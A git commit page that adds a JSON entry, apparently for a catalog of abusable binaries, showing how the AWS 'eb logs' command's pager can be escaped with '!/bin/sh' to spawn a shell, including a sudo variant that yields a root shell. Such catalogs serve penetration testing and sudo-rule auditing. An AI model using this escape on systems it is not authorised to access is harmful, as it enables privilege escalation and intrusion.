add data source for eb

master
t0thkr1s 4 years ago
parent f4fc3103c3
commit a46aa17fb0

@ -0,0 +1,15 @@
{
"description": "This invokes the default logging service, which is likely to be 'journalctl', other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI.",
"functions": {
"shell": [
{
"code": "eb logs\n!/bin/sh\n"
}
],
"sudo": [
{
"code": "sudo eb logs\n!/bin/sh\n"
}
]
}
}
Loading…
Cancel
Save